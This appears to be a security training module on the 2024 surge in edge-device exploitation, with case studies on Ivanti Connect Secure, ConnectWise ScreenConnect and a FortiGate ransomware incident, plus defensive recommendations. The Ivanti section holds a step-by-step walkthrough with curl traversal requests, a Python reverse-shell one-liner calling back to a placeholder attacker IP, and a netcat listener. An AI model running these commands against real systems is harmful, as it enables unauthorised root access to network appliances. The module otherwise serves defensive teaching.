Intermediate

Security Hot Takes: Mid-Year Review 2024

The first half of 2024 confirmed a trend that had been building since 2021: adversaries are increasingly moving away from traditional initial-access techniques — phishing, browser exploit...

Table of Contents

Module 1: The 2024 Surge in Edge Device Exploitation

Introduction: A Shift in Initial Access Techniques

The first half of 2024 confirmed a trend that had been building since 2021: adversaries are increasingly moving away from traditional initial-access techniques — phishing, browser exploitation, and endpoint malware — toward directly exploiting vulnerabilities in edge devices. This category includes firewalls, VPN concentrators, secure remote access gateways, and other perimeter-facing enterprise software.

Several high-CVSS-scoring vulnerabilities disclosed in products from vendors such as Ivanti, ConnectWise, and Atlassian throughout late 2023 and the first six months of 2024 illustrate this shift. Rather than being isolated incidents, they represent a broader pattern: threat actors — both cybercriminal and nation-state — have recognized that edge appliances sit at the perimeter of the network, are often internet-facing by design, and historically receive less scrutiny and slower patch cycles than internal systems.

flowchart LR
    A[Traditional Initial Access] --> A1[Phishing]
    A --> A2[Browser Exploitation]
    A --> A3[Endpoint Malware]
    B[2021-2024 Shift] --> B1[Edge Device Exploitation]
    B1 --> B2[Firewalls]
    B1 --> B3[VPN Gateways]
    B1 --> B4[Secure Remote Access Products]
    B1 --> B5[Enterprise Perimeter Software]

    A -.declining share.-> B

Vulnerability-tracking data going into 2024 showed that threat groups had pivoted, dating back to 2021, toward attacking vulnerable edge appliances. While operating systems, network infrastructure, and enterprise software all saw significant year-on-year increases in high-risk vulnerabilities through 2023, the jump specifically attributable to edge device attacks outpaced all of these other categories.

Within the operating-system category, the trend skewed more toward macOS and UNIX-based systems rather than Windows. Meanwhile, a cluster of CVEs tied to Ivanti, Cisco, FortiGate, Palo Alto, and Checkpoint products all surfaced within just the first six months of 2024 — a remarkably tight concentration of high-severity disclosures across the edge/perimeter product category.

Category2023 TrendH1 2024 Notable Vendors/Products
Edge devices / perimeter appliancesLargest year-on-year increase of any categoryIvanti, Cisco, FortiGate, Palo Alto, Checkpoint
Operating systemsSignificant increase, skewed toward macOS/UNIX
Network infrastructureSignificant increaseOverlaps with edge device vendors above
Enterprise softwareSignificant increaseConnectWise (ScreenConnect)
Desktop apps / web browsersComparatively smaller increase

Old Vulnerabilities Still Matter: The Legacy CVE Problem

A key question raised by this trend is whether the rise in edge device targeting is being driven by brand-new zero-days, or by legacy, well-known CVEs in unpatched devices still sitting on networks. The honest answer is: both.

Several of the edge device vulnerabilities exploited in this period had CVE identifiers dating back more than a year. As a companion example, a widely discussed OpenSSH remote code execution vulnerability disclosed around the same period was itself a regression of a CVE originally patched back in 2006 — meaning a fix that had existed for over a decade had been inadvertently reintroduced. This underscores that organizations need robust patch management processes that address both freshly disclosed CVEs and older, previously-patched vulnerabilities that may have crept back into supported code paths or that were simply never remediated on legacy devices.

Case Study 1: Ivanti Connect Secure (CVE-2024-21887 and CVE-2024-21893)

Toward the end of 2023 and into early 2024, two critical vulnerabilities were disclosed in Ivanti’s Connect Secure product (a VPN/secure remote access gateway):

  • CVE-2024-21887 — A command injection vulnerability.
  • CVE-2024-21893 — A server-side request forgery (SSRF) vulnerability in the product’s SAML component, which allowed access to certain resources without authentication.

Chained together, these two flaws allowed an unauthenticated attacker to ultimately achieve remote code execution against the appliance. Because Connect Secure sits at the network perimeter and is designed to be internet-facing, this made it an extremely attractive target: a single unauthenticated exploit chain could hand an attacker a foothold directly inside the corporate network, bypassing the very access controls the VPN was meant to enforce.

sequenceDiagram
    participant Attacker
    participant ConnectSecure as Ivanti Connect Secure
    Attacker->>ConnectSecure: SSRF via SAML component (CVE-2024-21893)
    Note right of ConnectSecure: Bypasses authentication,<br/>exposes internal API endpoints
    Attacker->>ConnectSecure: Command injection request (CVE-2024-21887)
    ConnectSecure-->>Attacker: Remote code execution
    Note over Attacker,ConnectSecure: Unauthenticated attacker gains a foothold<br/>on the network perimeter

Hands-On Exploitation Walkthrough: Chaining Directory Traversal to Remote Code Execution

The following is a conceptual, illustrative reconstruction of the exploitation chain as it was demonstrated against a lab instance of Ivanti Connect Secure. Exact endpoint names and payload values are representative rather than verbatim, since no downloadable proof-of-concept file accompanied the source material — but the technique (chaining a directory-traversal-based authentication bypass with a command injection primitive) mirrors the real, publicly documented Connect Secure exploit chain.

The attack chains two distinct vulnerability classes: an authentication bypass caused by a directory traversal flaw in an API endpoint, and a command injection vulnerability that is only reachable once that bypass has been used.

Step 1 — Confirm the directory traversal / authentication bypass. The traversal can be tested with a browser, but using curl from the command line is just as effective. The --path-as-is flag is essential here — without it, curl will normalize (and remove) the ../ sequences before they ever reach the server, defeating the traversal before it starts:

# --path-as-is prevents curl from collapsing ../ sequences locally
curl --path-as-is "https://<target-ip>/<vulnerable-api-endpoint>/../../v1/system/system-information"

The double-dot sequences move up one directory level out of the intended API path — in this case up into a v1 folder — and then back down into a system folder, targeting a system information file. A successful response returns the web server’s standard header followed by the contents of that internal system information file, confirming the traversal works and that the device is vulnerable.

Step 2 — Build a reverse shell payload. With confirmed traversal, the next goal is to escalate from reading files to executing code. A short Python one-liner reverse shell is prepared, calling back to a listener on the attacker’s machine:

# Illustrative reverse-shell one-liner (attacker infrastructure IP/port shown as placeholders)
python3 -c "import socket,os,pty;s=socket.socket();s.connect(('<attacker-ip>',4444));\
[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/sh')"

Because this payload must be delivered inside a URL, it is URL-encoded (e.g., using a tool such as CyberChef’s “URL Encode” operation with the “encode all special characters” option enabled) before being embedded in the request.

Step 3 — Start a local listener. Using the same port referenced in the reverse shell payload:

nc -lvnp 4444

Step 4 — Deliver the payload. Rather than targeting the system information path used to confirm the traversal, the payload is sent to a different internal path known (from prior research) to execute whatever script it receives — in this case, a licensing/key-status related endpoint:

curl --path-as-is "https://<target-ip>/<vulnerable-api-endpoint>/../../v1/license/keys-status?exec=<url-encoded-reverse-shell-payload>"

As soon as the request is sent, the payload executes and calls back to the listener. Running the id command against the resulting connection confirms the attacker has landed with root privileges on the appliance — a complete compromise of the device from a single unauthenticated exploit chain.

flowchart TD
    A[curl --path-as-is traversal test] --> B{System info file returned?}
    B -- Yes, vulnerable --> C[Build Python reverse-shell one-liner]
    C --> D[URL-encode payload e.g. via CyberChef]
    D --> E[Start local netcat listener on port 4444]
    E --> F[Deliver payload to internal exec-capable endpoint]
    F --> G[Reverse shell connects back]
    G --> H["id confirms uid=0 (root)"]
    B -- No --> X[Target likely patched]

Case Study 2: ConnectWise ScreenConnect Authentication Bypass (CVE-2024-1709)

In February 2024, ConnectWise ScreenConnect — a remote monitoring and management (RMM) tool — received a critical CVE: CVE-2024-1709, carrying the maximum CVSS score of 10.0. This was an authentication bypass vulnerability that allowed an unauthenticated attacker to create a new administrator account on a vulnerable ScreenConnect server. From there, the attacker could leverage that elevated access to achieve remote code execution by uploading a malicious extension module.

All versions of ScreenConnect starting at 23.9.7 and below were affected by this flaw.

flowchart LR
    A[Unauthenticated Attacker] --> B[Exploit CVE-2024-1709<br/>Authentication Bypass]
    B --> C[Create Rogue Admin Account]
    C --> D[Upload Malicious Extension Module]
    D --> E[Remote Code Execution]
    E --> F[Full Server Compromise]

Because ScreenConnect is an RMM tool, compromising a single instance can be especially damaging: RMM platforms are frequently used by managed service providers (MSPs) to administer many downstream customer environments simultaneously, meaning a single compromised ScreenConnect server can act as a pivot point into numerous otherwise-unrelated organizations.

Scale of Exposure: Shodan, FOFA, and the Volt Typhoon Connection

Both the Ivanti Connect Secure chain and the ConnectWise ScreenConnect flaw had a potentially enormous blast radius. Basic internet-wide scanning queries against both services using tools like Shodan and FOFA returned large numbers of exposed, internet-facing instances — and those query results only scratch the surface of what is actually discoverable through those platforms.

FOFA is a reconnaissance and asset-discovery tool that is used, among others, by Volt Typhoon — a China-based, nation-state-sponsored threat group known for actively targeting network edge devices in critical infrastructure sectors, as documented in a joint advisory from CISA and partner agencies. This is a notable detail: the same reconnaissance tooling available to security researchers and defenders is also being actively used by state-sponsored operators to identify exploitable edge devices at scale.

Putting the wider trend in perspective, Recorded Future reported that, since 2021, 85% of known zero-day vulnerabilities exploited by state-sponsored groups were found in public-facing network appliances such as mail servers and VPN products. Beyond using these devices purely for initial access, state-sponsored actors have also been observed exploiting SOHO (small office/home office) routers and VPN devices to build multi-hop proxy infrastructure for command-and-control communications, laying groundwork before ever launching an initial access attack against their ultimate target.

mindmap
  root((Edge Device<br/>Reconnaissance & Exposure))
    Scanning Tools
      Shodan
      FOFA
      Censys
    Nation-State Use
      Volt Typhoon
        China-based
        Targets critical infrastructure
        Uses FOFA for reconnaissance
    Statistics
      85% of state-sponsored zero-days<br/>since 2021 target public-facing<br/>network appliances
    Infrastructure Building
      SOHO router compromise
      VPN device compromise
      Multi-hop proxy chains for C2

Case Study 3: Fortinet FortiGate (CVE-2024-21762) and the Akira Ransomware Incident

A real-world incident illustrates how quickly the gap between disclosure and exploitation can close. CVE-2024-21762, affecting Fortinet FortiGate devices, had a patch made available in February 2024 — the same month the CVE was disclosed. One organization was expected to apply that patch but did not do so in time. The ransomware group Akira took advantage of the unpatched vulnerability to gain access to the organization’s infrastructure and deployed ransomware, encrypting the organization’s systems.

Fortunately, the organization had reliable backups and active cyber insurance coverage. Both the internal incident response team and the insurer’s response team mobilized quickly, and systems were fully restored within a single day with minimal disruption. Without those backups, the organization would very likely have been forced into a ransom payment decision.

sequenceDiagram
    participant Akira as Akira Ransomware Group
    participant FGT as FortiGate Device (Unpatched)
    participant Org as Victim Organization
    participant IR as IR Team + Cyber Insurance

    Note over FGT: CVE-2024-21762 patch released Feb 2024<br/>Device not patched in time
    Akira->>FGT: Exploit CVE-2024-21762
    FGT-->>Akira: Initial access to internal infrastructure
    Akira->>Org: Deploy ransomware, encrypt systems
    Org->>IR: Activate incident response + insurance
    IR->>Org: Restore from backups
    Note over Org,IR: Fully operational within one day<br/>due to reliable backups
DetailValue
CVECVE-2024-21762
Affected productFortinet FortiGate (FortiOS)
Patch availabilityFebruary 2024 (same month as disclosure)
Threat actorAkira ransomware group
Time from patch release to exploitationVery short — organization was not yet patched
OutcomeFull ransomware encryption of victim systems
RecoveryFull restoration within one day via backups + cyber insurance response

This case reinforces a recurring theme across all three vulnerabilities discussed: the window between a CVE being disclosed (and a patch becoming available) and active, real-world exploitation is often very short. Speed of patch deployment is a critical control, not an optional one.

Immediate Mitigations and Operational Best Practices

Several of the mitigations discussed are best practices that organizations should already have in place, but the edge-device trend makes their absence particularly costly:

RecommendationRationale
Never use privileged domain admin credentials on edge appliancesDirectly observed in Volt Typhoon activity — a compromised appliance with domain admin creds gives an attacker a direct path to full domain compromise
Subscribe to vendor security alertsEnsures rapid awareness of zero-days and critical CVEs so appliances can be patched as quickly as possible
Maintain a backup plan for appliances/servicesAllows a device to be safely taken offline for patching or incident response without extended business disruption
Patch to the latest supported versionAddresses both current and older/legacy CVEs still present in unpatched software
Monitor at all levels with automated alertingDetects suspicious activity such as unusual invocation of tools like ntdsutil on Windows
Enable process-creation logging on WindowsSurfaces living-off-the-land binary (LOLBin) activity that may otherwise appear benign; correlate against event timestamps and the user account involved
Enable equivalent logging on Linux systemsLinux activity should also be logged and monitored, not simply “shut down”
Deploy a SIEMCentralizes log correlation; open-source/commercial options such as Wazuh provide an accessible entry point
Back up critical systems with clear, simple recovery documentationRecovery/restore processes should be documented well enough that anyone can follow them under pressure
Rehearse live recovery drillsBuilds operational “muscle memory” — practice makes the recovery process reliable, not just theoretical
Automate and validate vulnerability scanningFunctions as ongoing internal penetration testing to catch exposure before attackers do
Implement Security Orchestration, Automation, and Response (SOAR)Enables automated, actionable playbook-driven responses to alerts rather than fully manual triage
Segment networks, especially OT environmentsLimits lateral movement and blast radius if an edge device or perimeter system is compromised
flowchart TD
    A[Edge Device Security Posture] --> B[Credential Hygiene]
    A --> C[Patch Management]
    A --> D[Monitoring and Detection]
    A --> E[Backup and Recovery]
    A --> F[Automation]
    A --> G[Network Segmentation]

    B --> B1[No domain admin creds on appliances]
    C --> C1[Subscribe to vendor alerts]
    C --> C2[Patch to latest supported version]
    D --> D1[Process-creation logging]
    D --> D2[SIEM deployment]
    D --> D3[LOLBin activity detection]
    E --> E1[Documented recovery runbooks]
    E --> E2[Live recovery drills]
    F --> F1[Automated vulnerability scanning]
    F --> F2[SOAR playbooks]
    G --> G1[Segment OT/ICS networks]

Special Considerations for OT and ICS Environments

Operational technology (OT) and industrial control system (ICS) environments introduce a different risk calculus than standard IT systems. One of the most common problems observed is OT/ICS equipment being directly connected to the internet — a configuration for which there is almost never a legitimate business justification.

Network architecture becomes the primary control here rather than patching, because patching in an OT/ICS environment carries a real risk of breaking an operational process, which can itself lead to costly downtime. Instead, the recommended approach is:

  • Ensure OT/ICS devices are not directly internet-facing.
  • Require at least a VPN connection to reach those devices, ideally protected with multifactor authentication (MFA).
  • Where feasible, implement a DMZ to further isolate OT/ICS networks from both the internet and the general corporate IT network.
  • Rely on network segmentation and architecture as the primary line of defense, since patch cadence is necessarily slower and more cautious in these environments.
flowchart LR
    Internet((Internet)) -.no direct connection.-x OT[OT / ICS Devices]
    Internet --> DMZ[DMZ]
    DMZ --> VPN[VPN + MFA]
    VPN --> OT
    IT[Corporate IT Network] --> DMZ

A risk-based approach is important across both IT and OT: not all assets carry equal value, so security investment and prioritization should be allocated according to the criticality of the asset being protected, rather than applied uniformly. For most organizations, patching promptly and enforcing multifactor authentication are the two highest-impact, most immediately actionable controls.

Longer-Term Strategic Recommendations: Rethinking VPNs, Zero Trust, SSE, and SASE

Beyond immediate cyber hygiene, there are longer-term, strategic changes that security leaders should be planning for:

  1. Reconsider reliance on traditional VPNs. As demonstrated repeatedly throughout this review, VPN and secure remote access products carry inherent vulnerabilities and represent a concentrated, high-value target. This also extends to third-party access scenarios — for example, granting a service provider VPN access to support an internal application introduces additional risk that must be actively managed.
  2. Move toward Zero Trust. Zero trust architecture prevents unauthorized access through more granular access control, requiring continuous re-authentication and re-authorization rather than a one-time perimeter check.
  3. Evaluate Secure Service Edge (SSE). SSE integrates security capabilities for safe browsing and secure SaaS application access, combining components such as Zero Trust Network Access (ZTNA), a cloud-delivered Secure Web Gateway, a Cloud Access Security Broker (CASB), and Firewall as a Service (FWaaS). This is a substantial architectural investment that may be beyond the scope of smaller organizations but is increasingly relevant for enterprise environments.
  4. Evaluate Secure Access Service Edge (SASE). SASE goes a step further, combining networking and security services together — including Software-Defined Wide Area Networking (SD-WAN), Secure Web Gateway, CASB, next-generation firewall capabilities, and ZTNA — into a single, centrally managed architecture. This centralization improves visibility and control while streamlining day-to-day network operations.
flowchart TD
    subgraph SSE[Secure Service Edge]
        SSE1[Zero Trust Network Access]
        SSE2[Cloud Secure Web Gateway]
        SSE3[Cloud Access Security Broker]
        SSE4[Firewall as a Service]
    end

    subgraph SASE[Secure Access Service Edge]
        SASE1[SD-WAN]
        SASE2[Secure Web Gateway]
        SASE3[Cloud Access Security Broker]
        SASE4[Next-Gen Firewall]
        SASE5[Zero Trust Network Access]
    end

    SSE -->|Adds networking + WAN services| SASE
ArchitectureCore FocusKey Components
Traditional VPNPoint-to-point encrypted tunnel accessStatic perimeter trust once connected
Zero TrustContinuous verification, least privilegeGranular access control, continuous re-authentication
Secure Service Edge (SSE)Secure browsing and SaaS accessZTNA, Cloud Secure Web Gateway, CASB, Firewall as a Service
Secure Access Service Edge (SASE)Unified networking + securitySD-WAN, Secure Web Gateway, CASB, Next-Gen Firewall, ZTNA

Summary

The first half of 2024 reinforced a clear and accelerating trend: adversaries — from cybercriminal ransomware crews to nation-state groups like Volt Typhoon — are prioritizing edge devices and perimeter-facing enterprise software as their primary initial access vector, ahead of traditional techniques like phishing and browser exploitation.

Key takeaways from this review:

  • Edge devices are now the fastest-growing high-risk category. Vulnerabilities in VPN gateways, firewalls, and remote access/RMM software (Ivanti, ConnectWise, Fortinet, Cisco, Palo Alto, Checkpoint) outpaced growth in operating system, general network infrastructure, and desktop/browser vulnerability categories.
  • Both new and legacy CVEs are being weaponized. Some of the most damaging vulnerabilities exploited in this period had been known for over a year; others, like the OpenSSH regression, resurrected flaws first patched nearly two decades earlier.
  • Exploit chains against these products are often simple and fast to weaponize. The Ivanti Connect Secure chain (directory traversal → authentication bypass → command injection → root) and the ConnectWise ScreenConnect flaw (auth bypass → rogue admin → malicious extension → RCE) both moved from disclosure to real-world exploitation in a short window.
  • Reconnaissance tooling cuts both ways. Platforms like Shodan and FOFA are used by defenders and researchers, but the same tools are actively leveraged by nation-state actors such as Volt Typhoon to identify exploitable edge devices at scale — and roughly 85% of known state-sponsored zero-day exploitation since 2021 has targeted exactly this class of public-facing appliance.
  • Backups and rehearsed recovery remain the single best insurance policy. The FortiGate/Akira ransomware case demonstrated that even after a successful exploit and full encryption, an organization with well-documented, rehearsed backup and recovery procedures returned to normal operations within a single day.
  • OT/ICS environments require a different playbook. Because patching can itself introduce operational risk and downtime, network segmentation, VPN/MFA-gated access, and DMZ architecture should serve as the primary controls rather than patch velocity alone.
  • Strategic, longer-term architecture changes are worth serious consideration. Reassessing reliance on traditional VPNs, adopting zero trust principles, and evaluating SSE/SASE architectures can materially reduce the blast radius of the next edge device vulnerability — and there will be a next one.

Ultimately, the throughline across every incident discussed is timing: the gap between a CVE being disclosed and it being actively exploited in the wild is shrinking. Organizations that combine rapid patch management, strong monitoring and detection (including for living-off-the-land activity), rehearsed backup/recovery processes, and a long-term shift toward zero trust and edge-consolidated architectures will be far better positioned to withstand the next wave of edge device targeting.


Search Terms

security · hot · takes · mid-year · threat · intel · networking · systems · case · study · edge · exploitation

More Security Hot Takes & Threat Intel courses

View all 21

Interested in this course?

Contact us to book it or get a custom training plan for your team.